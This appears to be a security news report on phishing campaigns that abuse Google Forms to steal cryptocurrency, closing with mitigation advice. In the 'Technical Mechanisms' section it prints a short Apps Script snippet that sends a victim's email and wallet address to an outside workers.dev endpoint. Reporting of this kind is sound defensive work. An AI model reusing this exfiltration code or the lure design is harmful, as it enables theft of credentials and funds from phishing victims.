Google Forms, a widely used tool for creating surveys and collecting data, has recently been exploited by cybercriminals to orchestrate sophisticated phishing campaigns aimed at stealing cryptocurrency. This trend, first identified in late 2024, has seen a significant surge in the second quarter of 2025, raising concerns among cybersecurity experts.
The Phishing Scheme Unveiled
The attack typically begins with an unsolicited email containing a link to a Google Form. These emails are crafted to appear legitimate, often bypassing spam filters due to their association with Google’s trusted domain. Upon clicking the link, recipients are directed to a form that impersonates a well-known cryptocurrency exchange. The form congratulates the user on a pending 1.275 BTC payout, enticing them to proceed.
Once the user engages with the form, they are redirected to a counterfeit withdrawal portal. Here, they are prompted to verify their wallet address and pay a nominal network fee to process the transaction. Unbeknownst to the victim, any credentials entered are immediately transmitted to the attackers’ command-and-control (C2) server. Additionally, any payments made are funneled through mixer wallets, effectively obscuring the financial trail and complicating recovery efforts.
Exploitation of Google Forms’ Features
A key factor in the success of this phishing campaign is the misuse of Google Forms’ notification system. Since the phishing emails originate from Google’s own SMTP infrastructure, they often pass domain-reputation checks, allowing them to land directly in users’ inboxes without raising suspicion. This exploitation underscores the challenges in detecting malicious activities when they leverage trusted platforms.
Technical Mechanisms Behind the Attack
The malicious forms employ embedded Apps Script-bound WebHooks to exfiltrate data. As soon as the victim clicks Submit, their information is silently sent to the attackers, even if the form isn’t fully completed. The script also includes a one-time JavaScript redirect to a fraudulent site, which mimics legitimate cryptocurrency platforms. This site features a polished user interface built with React and a backend API using Python Flask, which proxies requests to the attackers’ C2 server.
An example of the exfiltration script is as follows:
“`javascript
function onFormSubmit(e){
const payload = JSON.stringify({
email: e.namedValues[‘Email’][0],
wallet: e.namedValues[‘Wallet Address’][0]
});
UrlFetchApp.fetch(‘https://worker-cryptodrip.workers.dev/submit’, {
method: ‘post’,
contentType: ‘application/json’,
payload: payload
});
}
“`
This script captures the user’s email and wallet address upon form submission and sends it to the attackers’ server, facilitating immediate data theft.
Detection and Response Challenges
The use of Google Forms in these phishing attacks presents significant challenges for detection and response. Traditional email security measures often rely on domain reputation and known malicious URLs to identify threats. However, because these phishing emails originate from Google’s legitimate domain, they can evade these defenses. Furthermore, the dynamic nature of Google Forms URLs complicates static analysis and signature-based detection methods.
Security researchers have observed a 63% increase in Google Forms-based phishing messages during routine telemetry reviews of consumer endpoints in early July 2025. This spike highlights the effectiveness of this low-tech social engineering attack and the need for enhanced detection mechanisms.
Mitigation Strategies
To combat this evolving threat, organizations and individuals should implement a multi-layered defense strategy:
1. Email Filtering Enhancements: Deploy advanced email filters capable of analyzing the content and context of emails, not just the sender’s domain. This includes scrutinizing the presence of Google Forms links and assessing their legitimacy.
2. Content Disarm and Reconstruction (CDR): Implement CDR solutions that can neutralize potential threats by removing malicious content from emails before they reach the end-user.
3. Browser Security Extensions: Utilize browser extensions that can block outbound requests to unfamiliar or suspicious domains, preventing users from accessing malicious sites.
4. User Education and Awareness: Conduct regular training sessions to educate users about the risks of phishing attacks, especially those leveraging trusted platforms like Google Forms. Emphasize the importance of verifying unexpected communications and offers that seem too good to be true.
5. Multi-Factor Authentication (MFA): Enforce MFA across all sensitive accounts to add an additional layer of security, making it more difficult for attackers to gain unauthorized access even if credentials are compromised.
Conclusion
The exploitation of Google Forms in phishing campaigns targeting cryptocurrency users underscores the adaptability of cybercriminals and the need for continuous vigilance. By leveraging trusted platforms, attackers can effectively bypass traditional security measures, making it imperative for organizations and individuals to adopt comprehensive and proactive security strategies. Staying informed about emerging threats and implementing robust defenses are crucial steps in safeguarding against these sophisticated attacks.
